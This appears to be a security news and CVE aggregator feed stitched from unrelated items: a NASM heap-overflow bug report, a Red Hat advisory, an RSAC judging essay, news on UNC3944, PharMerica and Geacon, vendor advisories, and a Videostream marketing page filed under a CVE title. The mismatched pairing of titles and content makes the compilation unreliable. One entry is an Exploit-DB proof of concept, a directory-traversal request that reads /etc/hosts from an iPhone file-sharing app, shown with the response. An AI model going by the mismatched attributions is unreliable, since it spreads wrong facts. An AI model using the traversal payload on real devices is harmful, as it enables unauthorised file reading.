There exists a heap buffer overflow in nasm 2.16.02rc1 (GitHub commit: b952891).

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

**Bug 3392857** \- Heap-Buffer-Overflow in NASM( asm/preproc.c:6863 in expand\_mmacro)

Summary: Heap-Buffer-Overflow in NASM( asm/preproc.c:6863 in expand\_mmacro)

Status:

OPEN

Alias:

None

Product:

NASM

Classification:

Unclassified

Component:

Assembler (show other bugs)

Version:

2.16.xx

Hardware:

All Linux

Importance:

Medium normal

Assignee:

nobody

URL:

Depends on:

Blocks:

Reported:

2023-04-10 23:10 PDT by Daisy Chen

Modified:

2023-04-11 03:51 PDT (History)

CC List:

5 users (show)

Obtained from:

Build from source archive using configure

  

Attachments

**poc file to reproduce the problem** (1.57 KB, text/plain)  
2023-04-10 23:10 PDT, Daisy Chen

Details

**a new poc file that can run nasm without asan and we can analyze it with GDB** (2.92 KB, text/plain)  
2023-04-11 03:51 PDT, Daisy Chen

Details

Add an attachment (proposed patch, testcase, etc.)

  

Note You need to log in before you can comment on or make changes to this bug.

CVE-2023-31722: 3392857 – Heap-Buffer-Overflow in NASM( asm/preproc.c:6863 in expand_mmacro)

Red Hat Security Advisory 2023-1327-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.0 security update  
Advisory ID:       RHSA-2023:1327-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1327  
Issue date:        2023-05-17  
CVE Names:         CVE-2022-2990 CVE-2022-3259 CVE-2022-41717  
                   CVE-2022-41723 CVE-2022-41724 CVE-2022-41725  
                   CVE-2023-0056 CVE-2023-0229 CVE-2023-0778  
                   CVE-2023-25577 CVE-2023-25725  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.13.0 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.13.0. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:1326

Security Fix(es):

* golang: net/http: excessive memory growth in a Go server accepting HTTP/2  
requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [LSO]Error message about "ErrorFindingMatchingDisk"  is not clear for cr  
localvolume when no volume attached to worker (BZ#2053505)

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2053505 - [LSO]Error message about "ErrorFindingMatchingDisk"  is not clear for cr localvolume when no volume attached to worker  
2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-10381 - [4.13] vDPA vf cannot be created  
OCPBUGS-10702 - Fixing Topology DS pods startup  
OCPBUGS-10729 - NodeFeatureDiscovery CR Status is not populated/updated anymore  
OCPBUGS-10782 - Fixing the the release manifests directory to point to stable  
OCPBUGS-10896 - CNF Upstream MultiNetworkPolicy SR-IOV integration backport 4.13  
OCPBUGS-11065 - Pod annotaion key k8s.v1.cni.cncf.io/networks-status is changed  
OCPBUGS-3057 - SR-IOV | Connectivity doesn't work with iPv6+static mac on top of i40e driver  
OCPBUGS-3624 - End2End tests fail due to lack of Pod Security Admission  
OCPBUGS-3671 - Update image version to 4.12 in cluster-nfd-operator github repo config/manifests/bases/nfd.clusterserviceversion.yaml  
OCPBUGS-3679 - NFD cluster-nfd-operator make image support for arm64 deployment from github repo needs Dockerfile updates  
OCPBUGS-3682 - Allow multiple NFD CR in the cluster  
OCPBUGS-3683 - Allow multiple NFD CR in the cluster  
OCPBUGS-3689 - NFD does not properly detect AMD processors  
OCPBUGS-3707 - NFD operator default namespace openshift-nfd needs specific pod security labels added for OCP 4.12  
OCPBUGS-3745 - Replace deprecated go get in Makefile  
OCPBUGS-3747 - Changing kustomize version  
OCPBUGS-3815 - Update skipper configuration in NFD operator  
OCPBUGS-3838 - Adding local ARM compilation/build configuration  
OCPBUGS-3906 - Fix bundle for release-4.12  
OCPBUGS-396 - LSO should warn that diskmaker can't run because of taints  
OCPBUGS-4066 - fix operator naming convention  
OCPBUGS-4346 - fix operator naming convention  
OCPBUGS-4462 - fix incorrect format of old skipRange  
OCPBUGS-4722 - update sriov csv to 4.13 from 4.12  
OCPBUGS-5178 - BF2 is not converted to nic mode after applied converting machineConfig  
OCPBUGS-5293 - Current State  api call for os-clock-state creates nil pointer-Dual Nic  
OCPBUGS-5377 - Multiple times switching slave port to  fault causes the port state to remain in HOLDOVER  
OCPBUGS-5822 - NFD topologyupdater functionality missing on OCP 4.12 when deploying NFD from bundle  
OCPBUGS-6184 - Update 4.13 sriov-network-device-plugin image to be consistent with ART  
OCPBUGS-701 - SR-IOV VFs may get reseted after being allocated by other pods  
OCPBUGS-7826 - Multi node http service support not working for consumer  
OCPBUGS-7856 - [4.13] ovnkube pod crashed after enable ovs hardware offload in baremetal cluster

6. References:

https://access.redhat.com/security/cve/CVE-2022-2990  
https://access.redhat.com/security/cve/CVE-2022-3259  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2023-0056  
https://access.redhat.com/security/cve/CVE-2023-0229  
https://access.redhat.com/security/cve/CVE-2023-0778  
https://access.redhat.com/security/cve/CVE-2023-25577  
https://access.redhat.com/security/cve/CVE-2023-25725  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGRr2tzjgjWX9erEAQhYQg/+KWtiMPF6zFMjxpFDF5aTBUml4saZPmEr  
CzzBZQwLqMkBXo6wdRSdWl9KDCiVbIagIyWVXA1iknSQTKE0hvsXN214hCnTYjAY  
72mFujn6WyuonhYvSJRja0+b0qI7m/5dScB22dy4+0sCtoIgX8bHXvI3NACNXwRV  
wvWS14+n7f5eiQku9tmsu4IMuPfjqS81kbYLqsCCPeguZwu6sYYypl9OtbUN0rTt  
mWtFVb+/4Zd0l9cRNM3oM00pMIKr1YUZ9sk1wfMo+sofZiaZFH5X04y9pLFA/Jty  
Q5xzCfniJnTkcgqyuf/549jdK0/QfNfkHWgRvjkIxP/nN8W51SAaj+KchjBWLImL  
KBNji+MwGsw+2QpZBVOz9FtzyMVAdq9CNimoQWmQdKd2GW0Vm3mpNFPKX7jYGiAJ  
rDZhHRSVn00VtPzWPFmS2UzK3fhPCs0UXOtgf4WD5Ruf0aht0k0LMwbVfo5HIgaJ  
CICF6+B2FyNuUnxSzIAAFF1lEc+tcqooUr21sWCZBMO4NeUKK15IKY9vqGjKxMWY  
+rNFLJXdpZaHmzMRgNolEI/VFOzlrgVUK7MpGjzu/ojxJfdP/efrN+YNqrp898dd  
BZpnh6aqt34yAY6TonYToYqw0Q2He425cMx+wwoAssR3EeKOhcU6NbtazSWzJdX0  
m4IyVpJlAgE=rvUW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1327-01

Three pieces of advice to startups serious about winning funding and support for their nascent companies: Articulate your key message clearly, have the founder speak, and don't use a canned demo.

It was a great honor to serve as one of five judges for this year's RSAC Innovation Sandbox competition — the premier place to pitch your early-stage cybersecurity startup. Congratulations to the top two contenders, with Hidden Layer winning the award and Pangea Cyber taking the No. 2 spot. Keep an eye on these companies — and all this year's top 10 finalists.

Over the 17 years it's been running, the RSAC contest's 170 top 10 finalists have been involved in 75 acquisitions and received nearly $12.5 billion in investments. Last year, Talon Cyber Security and its Secure Enterprise Browser won the top honor, propelling the startup into new markets and catching the attention of many CISOs in the Fortune Global 2000. In earlier years, Phantom Cyber won the contest when its founder and CEO, Oliver Friedrichs, gave an unforgettable pitch — and just two years later, the company was acquired by Splunk. (Friedrichs is now founder and CEO of Pangea.)

As a venture capitalist, serving as a judge has reminded me of the incredible people in our industry and the remarkable innovations that will not only create new categories but also put a real dent in the cybersecurity challenges that enterprises face today.

As a new judge, I didn't exactly know what to expect, but it was a rewarding experience. I was impressed with the other judges and the varied and interesting perspectives they each brought to the table. My co-judges were Christopher Young, executive VP of business development, strategy, and ventures at Microsoft; Niloofar Razi Howe, senior operating partner at Energy Impact Partners; Shlomo Kramer, co-founder and CEO of Cato Networks; and Paul Kocher, an independent security researcher and founder of Cryptography Research.

Together we spent untold hours watching the pitch videos that contestants sent in. (I'd love to say how many, but I'm not at liberty to do so. I can tell you it was a _lot_ of them.) This was time consuming, but truly inspiring to see what people are working on and building toward in this industry.

**Giving a Voice to Future Trends**

I'm a true believer in the mission of the RSAC Innovation Sandbox, which is a stage to highlight the brightest startups every year. With 45,000 peers now attending the annual RSA Conference, the contest provides an important forum for early-stage companies to talk about how they're shaping our industry. For companies that typically have very little visibility, this type of opportunity — at such a critical time — can also really accelerate their fundraising and future.

One thing that struck me from listening to all those pitches is how important it is to be able to articulate your key messages in just three minutes. As a VC, I'm used to listening to pitches that run anywhere from 30 minutes to two hours. The RSAC Innovation Sandbox contestants must give their spiel and convince the judges why they should win in the time it would take to compose a short email. The pitches we saw ran the gamut from fast-talking and fact-filled to entertaining and fun. But my three pieces of advice to future contestants that are serious about winning would be:

*   **Cover the basics — and land them.** State the problem you're solving; explain what makes your solution unique; discuss the size of the addressable market; and talk about your early market traction. These are the key things judges want to hear to show you have a shot at success.

*   **Have your founder be your leader — always.** Judges want to know how the company got started and the founder or founders' vision for their company. A few of the pitches were delivered by salespeople, engineers, or just someone other than the founder. But founders are the soul of the company, and the best people to tell the story.

*   **Don't use a canned demo.** This is possibly your one opportunity to tell your story in front of a panel of carefully selected experts, and you want to make it worth their while. I would say one out of every five of the pitches were canned demos. This isn't a webinar. Don't treat it like one.

**Innovation Trends**

Now, back to the topic of innovation. Two big trends stood out to me this year.

*   **AppSec is back and better than ever.** We're seeing a big shift right now in how software engineers view application security. Developers are becoming more security-aware and are organically adopting tools that help them shift-left and address security at the beginning of the development process. There were a number of Sandbox finalists providing developer solutions for identifying security vulnerabilities faster and more accurately. The industry has been talking about building security into the fabric of software forever and now it's finally happening.

*   **The future is now.** Web3 is emerging as a new technology architecture for decentralized blockchain technologies and token-based systems such as crypto. One finalist offers a security operations center that protects Web3 digital assets. And, of course, we had plenty of representation from companies focused on artificial intelligence and machine learning in response to increasingly sophisticated cyberattacks.

After serving as a judge in this year's RSAC Innovation Sandbox, one thing is clear: The future is bright — and secure.

For more information on the Top 10 RSA Innovation Sandbox finalists, Dark Reading published a comprehensive overview.

I Was an RSAC Innovation Sandbox Judge — Here's What I Learned

savysoda Wifi HD Wireless Disk Drive 11 is vulnerable to Local File Inclusion.

    # Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
    # Date: Aug 13, 2022
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: http://www.savysoda.com
    # Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
    # Version: 11
    # Tested on: iPhone OS 15_5
    
    # Proof of Concept
    GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
    Host: 192.168.1.100
    Connection: close
    Upgrade-Insecure-Requests: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
    AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5  Safari/604.1
    Referer: http://192.168.1.103/
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Accept-Encoding: gzip, deflate
    
    
    -----------------
    
    HTTP/1.1 200 OK
    Content-Disposition: attachment
    Content-Type: application/download
    Content-Length: 213
    Accept-Ranges: bytes
    Date: Sat, 13 Aug 2022 03:33:30 GMT
    
    ##
    # Host Database
    #
    # localhost is used to configure the loopback interface
    # when the system is booting.  Do not change this entry.
    ##
    127.0.0.1 localhost
    255.255.255.255 broadcasthost
    ::1             localhost

CVE-2023-31904: OffSec’s Exploit Database Archive

A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments.
Google-owned Mandiant attributed the activity to a threat group it tracks under the name UNC3944, which is also known as Roasted 0ktapus and Scattered Spider.
"This method of attack was unique in

SIM Swapping / Server Security

A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments.

Google-owned Mandiant attributed the activity to a threat group it tracks under the name **UNC3944**, which is also known as Roasted 0ktapus and Scattered Spider.

"This method of attack was unique in that it avoided many of the traditional detection methods employed within Azure and provided the attacker with full administrative access to the VM," the threat intelligence firm said.

The emerging adversary, which first came to light in late last year, is known to leverage SIM swapping attacks to breach telecommunications and business process outsourcing (BPO) companies since at least May 2022.

Subsequently, Mandiant also found UNC3944 utilizing a loader named STONESTOP to install a malicious signed driver dubbed POORTRY that's designed to terminate processes associated with security software and delete files as part of a BYOVD attack.

It's currently not known how the threat actor conducts the SIM swaps, although the initial access methodology is suspected to involve the use of SMS phishing messages targeting privileged users to obtain their credentials and then staging a SIM swap to receive the two-factor authentication (2FA) token to a SIM card under their control.

Armed with the elevated access, the threat actor then moves to survey the target network by exploiting Azure VM extensions such as Azure Network Watcher, Azure Windows Guest Agent, VMSnapshot, and Azure Policy guest configuration.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

"Once the attacker completes their reconnaissance, they employ the serial console functionality in order to gain an administrative command prompt inside of an Azure VM," Mandiant said, adding it observed UNC3944 making use of PowerShell to deploy legitimate remote administration tools.

The development is yet another evidence of attackers taking advantage of living-off-the-land (LotL) techniques to sustain and advance an attack, while simultaneously circumventing detection.

"The novel use of the serial console by attackers is a reminder that these attacks are no longer limited to the operating system layer," Mandiant said.

"Unfortunately, cloud resources are often poorly misunderstood, leading to misconfigurations that can leave these assets vulnerable to attackers. While methods of initial access, lateral movement, and persistence vary from one attacker to another, one thing is clear: Attackers have their eyes on the cloud."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover

Canon IJ Network Tool/Ver.4.7.5 and earlier (supported OS: OS X 10.9.5-macOS 13),IJ Network Tool/Ver.4.7.3 and earlier (supported OS: OS X 10.7.5-OS X 10.8) allows an attacker to acquire sensitive information on the Wi-Fi connection setup of the printer from the communication of the software.

**Description**

A couple of vulnerabilities have been identified for IJ Network Tool (Hereafter, the Software). These vulnerabilities suggest the possibility that an attacker connected to the same network as the printer may be able to acquire sensitive information on the Wi-Fi connection setup of the printer by using the Software or by referring to its communication.

**Affected Products/Versions**

IJ Network Tool/Ver.4.7.5 and earlier (supported OS: OS X 10.9.5-macOS 13)

IJ Network Tool/Ver.4.7.3 and earlier (supported OS: OS X 10.7.5-OS X 10.8)

**CVE/CVSS**

CVE-2023-1763:

Acquisition of sensitive information on the Wi-Fi connection setup of the printer from the Software

 

CVSS v3  CVSS: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N   Base Score: 6.5

CVE-2023-1764:

Acquisition of sensitive information on the Wi-Fi connection setup of the printer from the communication of the Software

 

CVSS v3  CVSS: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N   Base Score: 6.5

**Mitigation/Remediation**

For CVE-2023-1763:

The workaround for this vulnerability is to use printers with a trusted network connection. Please refer here for “Securing products when connecting to a network”. In addition, the Software designed to address this issue will be released accordingly.

For CVE-2023-1764:

The workaround for this vulnerability is to use printers with a trusted network connection. Please refer here for “Securing products when connecting to a network”.

CVE-2023-1764: CP2023-002 Vulnerabilities of IJ Network Tool regarding Wi-Fi connection setup

Categories: News
Categories: Ransomware
Tags: PharMerica

Tags:  Money Message

Tags:  ransomware

Tags:  PII

Tags:  SSN

US pharmacy giant PharMerica has reported a cybersecurity incident that affects over 5.8 million people. The data theft has been claimed by ransomware group Money Message.



(Read more...)




The post PharMerica breach impacts almost 6 million people appeared first on Malwarebytes Labs.

US pharmacy giant PharMerica has notified over 5.8 million people about a security incident in which it says personal information and medical information may have been obtained by cybercriminals. The Data Breach Notification lists the total number of persons affected as 5,815,591.

An investigation was started after PharMerica noticed suspicious activity on its network. The investigation showed that an unauthorized party accessed PharMerica computer systems on March 12-13, 2023, and that this party may have had access to certain personal information. The incident was noticed on March 14, and a week later PharMerica identified that the personal information accessed included names, dates of birth, Social Security numbers, medication lists and health insurance information.

Ransomware group Money Message has claimed responsibility for the attack. The gang claims that they encrypted almost the entire PharMerica infrastructure, and has published parts of the stolen data to their leak site.

_Image courtesy of BleepingComputer_

Money Message is a new ransomware which targets both Windows and Linux systems. As we mentioned in our May ransomware review, Taiwanese PC parts maker MSI also fell victim to Money Message.

On its website PharMerica says:

> “At this point, PharMerica is not aware of any fraud or identity theft to any individual as a result of this incident, but is nonetheless notifying potentially affected individuals to provide them with more information and resources. The notice will include information on steps individuals can take to protect themselves against potential fraud or identity theft. PharMerica has arranged for complimentary identity protection and credit monitoring services for potentially affected individuals.”

An extra point of concern is that a relative large part of the people affected by the breach have passed away, which makes it unlikely that relatives will regularly monitor their credit reports, making any cybercrime related to the stolen data even more difficult to detect and stop.

**What to do if you've been caught in a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor's advice. Every breach is different, so check with the vendor to find out what's happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don't use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

PharMerica breach impacts almost 6 million people

The MoroSystems EasyMind - Mind Maps plugin before 2.15.0 for Confluence allows persistent XSS when saving a Mind Map with the hyperlink parameter.

CVE-2023-30452: EasyMind - Mind Maps for Confluence - Version history

Videostream macOS app 0.5.0 and 0.4.3 has a Race Condition. The Updater privileged script attempts to update Videostream every 5 hours.

**Downloaded videos on your Chromecast. Instantly.****The easiest way to stream

videos MP4s MKVs AVIs WMVs MP3s

from your computer to Chromecast or AndroidTV.  
Control it all from Android or iOS.**

  

Brooklyn Nine Nine © 2013-2015 Fremulon, Dr. Goor Productions (PG)

play\_arrow

No setup. Seriously.  
**Just start watching.**

event\_seat

**Relax with Mobile Apps**

Play, pause, & seek from your couch with **free** Android and iOS remotes.

**Play MKVs, AVIs, MP4s, MP3s...**

Videostream supports over 400 video and audio codecs out of the box.  
This means you can **play almost any video on your Chromecast!**

**...with no setup**

There's no pesky library setup or servers to install.  
There's no accounts to create or codecs to download.  
**Just choose a video and ...no really, that's it!**  
Start watching any video on your Chromecast in seconds, Install the Desktop App now!

Frozen © 2013 Walt Disney Animation Studios (G)

Suits © 2011-2015 Universal Cable (TV-14)

**Playlists, Subtitles, & Rainbows,  
Premium is Awesome.**

done

**Playlists:** Binge watch your favourite shows using playlists in Chrome

done

**Subtitles:** Get extra settings to change subtitle size and color

done

**Notifications:** Notifications on Android when your downloads finish

done

**Love:** Support (and feed!) our team of 7 developers in Canada! <3

**Start watching downloads on your Chromecast!**

**"It's the perfect app to stream your media to your Chromecasts"**

"No fiddling about with extra services, just find the file you want and have it play in the big screen." - Gizmodo

**It transformed my Chromecast from a Netflix and YouTube machine to a watch-whatever-I-want-machine. Which is great!**

\- Shonda, Videostream User

**Let me start by saying that I recently bought the lifetime premium membership and I absolutely love Videostream. It is my favorite thing in the world after pizza and Coca-Cola.**

\- Aldo, Videostream Premium User

**I have a very large movie collection on a networked drive, and it never fails to load the movies, cast them, load subtitles, etc. It's a piece of technology and media genius, so thank you all.**

\- Eliza, Videostream User

**I just wanted to say how much I love Videostream. I use it almost every day. Now that I can select files right from my phone, it is a completely hassle free experience.**

\- Rezaan, Videostream User

**People love Videostream. Try it yourself for free!  
**

**7 developers in Canada eh!?**

Just bunch of Canucks coding for the love of perfect streaming video <3

**Frequently Asked Questions**

Got questions? We have answers (if your answer isn't below, email us!)

**Do you play \_\_\_ files? (MKV, MP4, AVI, WMV...)**

Yup!! Videostream supports over 400 audio and video codecs so with almost complete certainty, yes.

**How much does it cost?**

Nothing, zip, zilch, nada, Videostream is completely free! If you're enjoying Videostream and want some extra features like playlists, extra subtitle settings, night mode, autoplay, and more, then Videostream Premium is for you!

**I have slow internet, will Videostream work?**

You bet! Since you are streaming video from your computer directly to your Chromecast or AndroidTV, Videostream doesn't use any of your internet bandwidth! That means no extra usage on your bill, no slowed down traffic on other devices.

**How do I setup Videostream?**

It's super simple! Open Google Chrome and then install Videostream. If you have an iPhone or Android phone you can check out our remote controls on those apps stores too!

**Does Videostream have playlists?!**

Is maple syrup sweet?! You bet! Playlists let you binge watch movies, tv shows, and even listen to music on your Chromecast. You can even shuffle or repeat your playlist! Grab your playlists in Videostream Premium, download and upgrade in the Desktop or Android App today!

**What if I have another question?**

Email us at \[email protected\]! Our awesome support bro Andrew will be sure to email you back with answers to your questions, solutions to your problems, and a random selection of cat pictures and gifs!

**Come on, it's what you bought your Chromecast for!**

CVE-2023-25394: What you bought your Chromecast for.

Threat actors seen using Go-language implementation of the red-teaming tool on Intel and Apple silicon-based macOS systems.

Heads up: threat actors are now deploying a Go-language implementation of Cobalt Strike called Geacon that first surfaced on GitHub four years ago and had remained largely under the radar.

They are using the red-teaming and attack-simulation tool to target macOS systems in much the same way they have used Cobalt Strike for post-exploit activity on Windows platforms the past few years.

Security researchers at SentinelOne reported the activity this week after spotting several Geacon payloads appearing on VirusTotal in recent months. SentinelOne's analysis of the samples showed some were likely related to legitimate enterprise red-team exercises, while others appeared to be artifacts of malicious activity.

One malicious sample submitted to VirusTotal on April 5 is an AppleScript applet titled "Xu Yiqing's Resume\_20230320.app" that downloads an unsigned Geacon payload from a malicious server with a China-based IP address.

SentinelOne found the application is compiled for macOS systems running on either Apple or Intel silicon. The applet contains logic that helps it determine the architecture of a particular macOS system so it can download the specific Geacon payload for that device. The compiled Geacon binary itself contains an embedded PDF that first displays a resume for an individual named Xu Yiqing before beaconing out to its command and control (C2) server.

"The compiled Geacon binary has a multitude of functions for tasks such as network communications, encryption, decryption, downloading further payloads, and exfiltrating data," SentinelOne said.

In another instance, SentinelOne discovered a Geacon payload embedded in a fake version of the SecureLink enterprise remote-support application. The payload appeared in VirusTotal on April 11 and targeted only Intel-based macOS systems. Unlike the previous Geacon sample, SentinelOne found the second one to be a bare-bones, unsigned application likely built with an automated tool. The app required the user to grant access to the device camera, microphone, administrator privileges, and other settings typically protected under macOS's Transparency, Consent, and Control framework. In this instance, the Geacon payload communicated with a known Cobalt Strike C2 server with an IP address based in Japan.

"This is not the first time we have seen a Trojan masquerading as SecureLink with an embedded open-source attack framework," SentinelOne said. The security vendor pointed to its discovery last September of an open-source attack framework for macOS called Sliver embedded with a fake SecureLink as another example. "\[Its\] a reminder to all that enterprise Macs are now being widely targeted by a variety of threat actors," SentinelOne said.

**Sudden Interest**

Attackers have long used Cobalt Strike for a variety of malicious post-exploit activities on Windows systems including for establishing command-and-control, lateral movement, payload generation, and exploit delivery. There have been instances where attackers have occasionally used Cobalt Strike to target macOS as well. One example is a typosquatting attack last year where a threat actor attempted to deploy Cobalt Strike on Windows, Linux, and macOS systems by uploading a malicious package dubbed "pymafka" to the PyPI register.

In other instances, attackers have also used a macOS focused red-teaming tool called Mythic as part of their attack chains.

The activity involving Geacon itself started shortly after an anonymous Chinese researcher using the handle "z3ratu1" released two Geacon forks last October — one private and likely for sale called "geacon\_pro" and the other public, called geacon-plus. The pro version includes some additional features like anti-virus bypassing and anti-kill capabilities, says Tom Hegel, senior threat researcher at SentinelOne.

He ascribes the sudden attacker interest in Geacon to a blog that z3ratu1 posted describing the two forks and his attempts to market his work. The original Geacon project itself was largely for protocol analysis and reverse engineering purposes, he says.

**Mac Attacks**

The growing malicious use of Geacon fits in with a broader pattern of growing attacker interest in macOS systems.

Earlier this year, researchers at Uptycs reported on a novel new Mac malware sample dubbed "MacStealer" that, in keeping with its name, stole documents, iCloud keychain data, browser cookies, and other data from Apple users. In April, the operators of "Lockbit " became the first major ransomware actor to develop a Mac version of their malware, setting the stage for others to follow. And last year, North Korea's notorious Lazarus Group become among the first known state-backed groups to begin targeting Apple Macs.

SentinelOne has released a set of indicators to help organizations identify malicious Geacon payloads.

Tag

#mac